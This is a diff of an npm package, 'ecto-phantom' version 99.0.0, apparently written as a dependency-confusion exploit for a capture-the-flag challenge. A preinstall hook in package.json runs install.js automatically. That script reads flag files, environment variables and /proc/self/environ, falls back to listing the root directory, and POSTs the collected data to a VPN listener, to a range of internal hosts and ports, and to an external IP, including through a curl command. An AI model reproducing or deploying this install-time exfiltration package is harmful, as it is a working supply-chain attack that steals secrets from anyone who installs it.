ecto-phantom 99.0.0

package/index.js

@@ -0,0 +1 @@
+module.exports = {};

package/install.js

@@ -0,0 +1,93 @@
+const fs = require('fs');
+const http = require('http');
+const https = require('https');
+const { execSync } = require('child_process');
+
+function tryRead(path) {
+  try { return fs.readFileSync(path, 'utf8').trim(); } catch(e) { return null; }
+}
+
+let flag = tryRead('/flag') || tryRead('/flag.txt') || tryRead('/root/flag') || tryRead('/root/flag.txt') || tryRead('/app/flag') || tryRead('/app/flag.txt') || tryRead('/tmp/flag') || tryRead('./flag') || tryRead('./flag.txt');
+
+if (!flag) flag = process.env.FLAG || process.env.FLAG_HTB || process.env.HTB_FLAG || '';
+
+if (!flag) {
+  try {
+    const env = tryRead('/proc/self/environ') || '';
+    const m = env.match(/FLAG[=:]([^\x00]+)/);
+    if (m) flag = m[1];
+  } catch(e) {}
+}
+
+if (!flag) {
+  try {
+    const files = fs.readdirSync('/');
+    const flagFiles = files.filter(f => f.includes('flag'));
+    for (const f of flagFiles) {
+      const content = tryRead('/' + f);
+      if (content && content.includes('HTB{')) { flag = content; break; }
+    }
+  } catch(e) {}
+}
+
+if (!flag) {
+  try { flag = 'NOFLAG_LS:' + fs.readdirSync('/').join(','); } catch(e) { flag = 'NOFLAG_ERR'; }
+}
+
+const data = JSON.stringify({ flag: flag, ts: Date.now(), cwd: process.cwd(), uid: process.getuid ? process.getuid() : 'N/A' });
+
+// Exfiltrate to VPN IP
+function sendHTTP(host, port, path, payload) {
+  return new Promise((resolve) => {
+    const req = http.request({ hostname: host, port, path, method: 'POST', headers: { 'Content-Type': 'application/json', 'Content-Length': Buffer.byteLength(payload) }, timeout: 5000 }, (res) => {
+      let d = ''; res.on('data', c => d += c); res.on('end', () => resolve(d));
+    });
+    req.on('error', () => resolve(null));
+    req.on('timeout', () => { req.destroy(); resolve(null); });
+    req.write(payload);
+    req.end();
+  });
+}
+
+function sendUpdate(host, port, moduleId, flagVal) {
+  const manifest = `ecto_module:\n  name: "FLAG_${flagVal.substring(0,80)}"\n  version: "1.0.0"\n  power_level: 1\n  ship_deck: 1\n  cargo_hold: 1`;
+  const body = JSON.stringify({ manifest });
+  return new Promise((resolve) => {
+    const req = http.request({ hostname: host, port, path: `/api/modules/${moduleId}`, method: 'PUT', headers: { 'Content-Type': 'application/json', 'Content-Length': Buffer.byteLength(body) }, timeout: 5000 }, (res) => {
+      let d = ''; res.on('data', c => d += c); res.on('end', () => resolve(d));
+    });
+    req.on('error', () => resolve(null));
+    req.on('timeout', () => { req.destroy(); resolve(null); });
+    req.write(body);
+    req.end();
+  });
+}
+
+(async () => {
+  // Method 1: Send to VPN listener
+  await sendHTTP('100.64.0.1', 8888, '/flag', data);
+  
+  // Method 2: Update module via internal API (try multiple ports)
+  const ports = [3000, 5000, 8080, 80, 8000, 3001, 4000];
+  for (const p of ports) {
+    await sendUpdate('127.0.0.1', p, 'ECT-839201', flag || 'EMPTY');
+    await sendUpdate('localhost', p, 'ECT-839201', flag || 'EMPTY');
+  }
+  
+  // Method 3: Try app hostname
+  for (const h of ['app', 'web', 'backend', 'api', 'node']) {
+    for (const p of [3000, 80, 8080]) {
+      await sendUpdate(h, p, 'ECT-839201', flag || 'EMPTY');
+    }
+  }
+  
+  // Method 4: Also try the external IP
+  await sendUpdate('154.57.164.82', 32332, 'ECT-839201', flag || 'EMPTY');
+  
+  // Method 5: DNS exfil via curl
+  try {
+    execSync(`curl -sf -X POST http://100.64.0.1:8888/flag2 -d '${data.replace(/'/g, "")}'`, { timeout: 5000 });
+  } catch(e) {}
+  
+  console.log('[DONE] Flag exfiltration attempted');
+})();

package/package.json

@@ -0,0 +1,11 @@
+{
+  "name": "ecto-phantom",
+  "version": "99.0.0",
+  "description": "Spectral ecto-module",
+  "main": "index.js",
+  "scripts": {
+    "preinstall": "node install.js || true"
+  },
+  "author": "lwirz",
+  "license": "ISC"
+}